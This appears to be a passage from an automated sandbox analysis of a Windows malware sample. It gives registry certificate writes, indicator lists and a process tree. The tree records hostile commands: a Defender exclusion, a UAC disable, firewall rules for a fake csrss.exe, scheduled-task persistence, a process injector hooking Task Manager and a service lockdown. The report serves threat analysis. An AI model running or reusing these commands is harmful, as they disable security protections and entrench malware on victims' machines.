190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e tha95OBw3Tsn7AWPLsWEDL4y.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e tha95OBw3Tsn7AWPLsWEDL4y.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 tha95OBw3Tsn7AWPLsWEDL4y.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e tha95OBw3Tsn7AWPLsWEDL4y.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4908 powershell.exe 4908 powershell.exe 3568 powershell.EXE 3568 powershell.EXE 3568 powershell.EXE 5228 powershell.exe 5228 powershell.exe 5308 powershell.exe 5308 powershell.exe 5228 powershell.exe 5308 powershell.exe 1820 KVNZSaD28HGP82BSu04KxHiU.exe 1820 KVNZSaD28HGP82BSu04KxHiU.exe 2044 J8MZqzY86iIMzzByraYnKAlH.exe 2044 J8MZqzY86iIMzzByraYnKAlH.exe 4192 nsn5AA5.tmp 4192 nsn5AA5.tmp 5712 powershell.exe 5712 powershell.exe 5712 powershell.exe 3820 powershell.exe 3820 powershell.exe 3820 powershell.exe 456 powershell.exe 456 powershell.exe 456 powershell.exe 5332 powershell.exe 5332 powershell.exe 5332 powershell.exe 4292 powershell.exe 4292 powershell.exe 4292 powershell.exe 4524 KVNZSaD28HGP82BSu04KxHiU.exe 4524 KVNZSaD28HGP82BSu04KxHiU.exe 4524 KVNZSaD28HGP82BSu04KxHiU.exe 4524 KVNZSaD28HGP82BSu04KxHiU.exe 4524 KVNZSaD28HGP82BSu04KxHiU.exe 4524 KVNZSaD28HGP82BSu04KxHiU.exe 4524 KVNZSaD28HGP82BSu04KxHiU.exe 4524 KVNZSaD28HGP82BSu04KxHiU.exe 4524 KVNZSaD28HGP82BSu04KxHiU.exe 4524 KVNZSaD28HGP82BSu04KxHiU.exe 5188 J8MZqzY86iIMzzByraYnKAlH.exe 5188 J8MZqzY86iIMzzByraYnKAlH.exe 5188 J8MZqzY86iIMzzByraYnKAlH.exe 5188 J8MZqzY86iIMzzByraYnKAlH.exe 5188 J8MZqzY86iIMzzByraYnKAlH.exe 5188 J8MZqzY86iIMzzByraYnKAlH.exe 5188 J8MZqzY86iIMzzByraYnKAlH.exe 5188 J8MZqzY86iIMzzByraYnKAlH.exe 5188 J8MZqzY86iIMzzByraYnKAlH.exe 5188 J8MZqzY86iIMzzByraYnKAlH.exe 5256 powershell.exe 5256 powershell.exe 5256 powershell.exe 456 powershell.exe 456 powershell.exe 456 powershell.exe 4452 powershell.exe 4452 powershell.exe 4452 powershell.exe 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 1460 48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe Token: SeDebugPrivilege 4908 powershell.exe Token: SeDebugPrivilege 5076 jsc.exe Token: SeDebugPrivilege 3568 powershell.EXE Token: SeDebugPrivilege 5308 powershell.exe Token: SeDebugPrivilege 5228 powershell.exe Token: SeDebugPrivilege 1820 KVNZSaD28HGP82BSu04KxHiU.exe Token: SeImpersonatePrivilege 1820 KVNZSaD28HGP82BSu04KxHiU.exe Token: SeDebugPrivilege 2044 J8MZqzY86iIMzzByraYnKAlH.exe Token: SeImpersonatePrivilege 2044 J8MZqzY86iIMzzByraYnKAlH.exe Token: SeDebugPrivilege 5712 powershell.exe Token: SeDebugPrivilege 3820 powershell.exe Token: SeDebugPrivilege 456 powershell.exe Token: SeDebugPrivilege 5332 powershell.exe Token: SeDebugPrivilege 4292 powershell.exe Token: SeDebugPrivilege 5256 powershell.exe Token: SeDebugPrivilege 456 powershell.exe Token: SeDebugPrivilege 4452 powershell.exe Token: SeDebugPrivilege 1500 powershell.exe Token: SeDebugPrivilege 1012 powershell.exe Token: SeDebugPrivilege 5488 powershell.exe Token: SeDebugPrivilege 5860 powershell.exe Token: SeSystemEnvironmentPrivilege 4940 csrss.exe Token: SeSecurityPrivilege 1176 sc.exe Token: SeSecurityPrivilege 1176 sc.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2144 BroomSetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1460 wrote to memory of 4908 1460 48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe 89 PID 1460 wrote to memory of 4908 1460 48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe 89 PID 1460 wrote to memory of 5076 1460 48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe 94 PID 1460 wrote to memory of 5076 1460 48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe 94 PID 1460 wrote to memory of 5076 1460 48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe 94 PID 1460 wrote to memory of 5076 1460 48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe 94 PID 1460 wrote to memory of 5076 1460 48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe 94 PID 1460 wrote to memory of 5076 1460 48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe 94 PID 1460 wrote to memory of 5076 1460 48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe 94 PID 1460 wrote to memory of 5076 1460 48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe 94 PID 5076 wrote to memory of 2044 5076 jsc.exe 100 PID 5076 wrote to memory of 2044 5076 jsc.exe 100 PID 5076 wrote to memory of 2044 5076 jsc.exe 100 PID 5076 wrote to memory of 1820 5076 jsc.exe 101 PID 5076 wrote to memory of 1820 5076 jsc.exe 101 PID 5076 wrote to memory of 1820 5076 jsc.exe 101 PID 5076 wrote to memory of 4632 5076 jsc.exe 102 PID 5076 wrote to memory of 4632 5076 jsc.exe 102 PID 5076 wrote to memory of 4044 5076 jsc.exe 103 PID 5076 wrote to memory of 4044 5076 jsc.exe 103 PID 5076 wrote to memory of 4044 5076 jsc.exe 103 PID 4044 wrote to memory of 2144 4044 riNVBxveUPQ1dduMvr5TXg7i.exe 104 PID 4044 wrote to memory of 2144 4044 riNVBxveUPQ1dduMvr5TXg7i.exe 104 PID 4044 wrote to memory of 2144 4044 riNVBxveUPQ1dduMvr5TXg7i.exe 104 PID 2144 wrote to memory of 2736 2144 BroomSetup.exe 107 PID 2144 wrote to memory of 2736 2144 BroomSetup.exe 107 PID 2144 wrote to memory of 2736 2144 BroomSetup.exe 107 PID 2736 wrote to memory of 3320 2736 cmd.exe 108 PID 2736 wrote to memory of 3320 2736 cmd.exe 108 PID 2736 wrote to memory of 3320 2736 cmd.exe 108 PID 2736 wrote to memory of 3588 2736 cmd.exe 199 PID 2736 wrote to memory of 3588 2736 cmd.exe 199 PID 2736 wrote to memory of 3588 2736 cmd.exe 199 PID 4044 wrote to memory of 4192 4044 riNVBxveUPQ1dduMvr5TXg7i.exe 111 PID 4044 wrote to memory of 4192 4044 riNVBxveUPQ1dduMvr5TXg7i.exe 111 PID 4044 wrote to memory of 4192 4044 riNVBxveUPQ1dduMvr5TXg7i.exe 111 PID 5076 wrote to memory of 2664 5076 jsc.exe 110 PID 5076 wrote to memory of 2664 5076 jsc.exe 110 PID 5076 wrote to memory of 2664 5076 jsc.exe 110 PID 2664 wrote to memory of 4512 2664 ZxIyRlydDx0u0UehgXz9WXlL.exe 112 PID 2664 wrote to memory of 4512 2664 ZxIyRlydDx0u0UehgXz9WXlL.exe 112 PID 2664 wrote to memory of 4512 2664 ZxIyRlydDx0u0UehgXz9WXlL.exe 112 PID 4512 wrote to memory of 2900 4512 Install.exe 113 PID 4512 wrote to memory of 2900 4512 Install.exe 113 PID 4512 wrote to memory of 2900 4512 Install.exe 113 PID 2900 wrote to memory of 4132 2900 Install.exe 119 PID 2900 wrote to memory of 4132 2900 Install.exe 119 PID 2900 wrote to memory of 4132 2900 Install.exe 119 PID 2900 wrote to memory of 1912 2900 Install.exe 140 PID 2900 wrote to memory of 1912 2900 Install.exe 140 PID 2900 wrote to memory of 1912 2900 Install.exe 140 PID 4132 wrote to memory of 1292 4132 forfiles.exe 125 PID 4132 wrote to memory of 1292 4132 forfiles.exe 125 PID 4132 wrote to memory of 1292 4132 forfiles.exe 125 PID 1912 wrote to memory of 692 1912 tha95OBw3Tsn7AWPLsWEDL4y.exe 124 PID 1912 wrote to memory of 692 1912 tha95OBw3Tsn7AWPLsWEDL4y.exe 124 PID 1912 wrote to memory of 692 1912 tha95OBw3Tsn7AWPLsWEDL4y.exe 124 PID 1292 wrote to memory of 3600 1292 cmd.exe 138 PID 692 wrote to memory of 624 692 cmd.exe 122 PID 1292 wrote to memory of 3600 1292 cmd.exe 138 PID 1292 wrote to memory of 3600 1292 cmd.exe 138 PID 692 wrote to memory of 624 692 cmd.exe 122 PID 692 wrote to memory of 624 692 cmd.exe 122 PID 692 wrote to memory of 4724 692 cmd.exe 121 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe"C:\Users\Admin\AppData\Local\Temp\48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Users\Admin\Pictures\J8MZqzY86iIMzzByraYnKAlH.exe"C:\Users\Admin\Pictures\J8MZqzY86iIMzzByraYnKAlH.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5228
-
-
C:\Users\Admin\Pictures\J8MZqzY86iIMzzByraYnKAlH.exe"C:\Users\Admin\Pictures\J8MZqzY86iIMzzByraYnKAlH.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:5188 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2416
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:456
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
-
-
C:\Users\Admin\Pictures\KVNZSaD28HGP82BSu04KxHiU.exe"C:\Users\Admin\Pictures\KVNZSaD28HGP82BSu04KxHiU.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5308
-
-
C:\Users\Admin\Pictures\KVNZSaD28HGP82BSu04KxHiU.exe"C:\Users\Admin\Pictures\KVNZSaD28HGP82BSu04KxHiU.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5332
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:1684
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5256
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5488
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:5564
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:4648
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5860
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:5284
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:3624
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:5940 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:5660
-
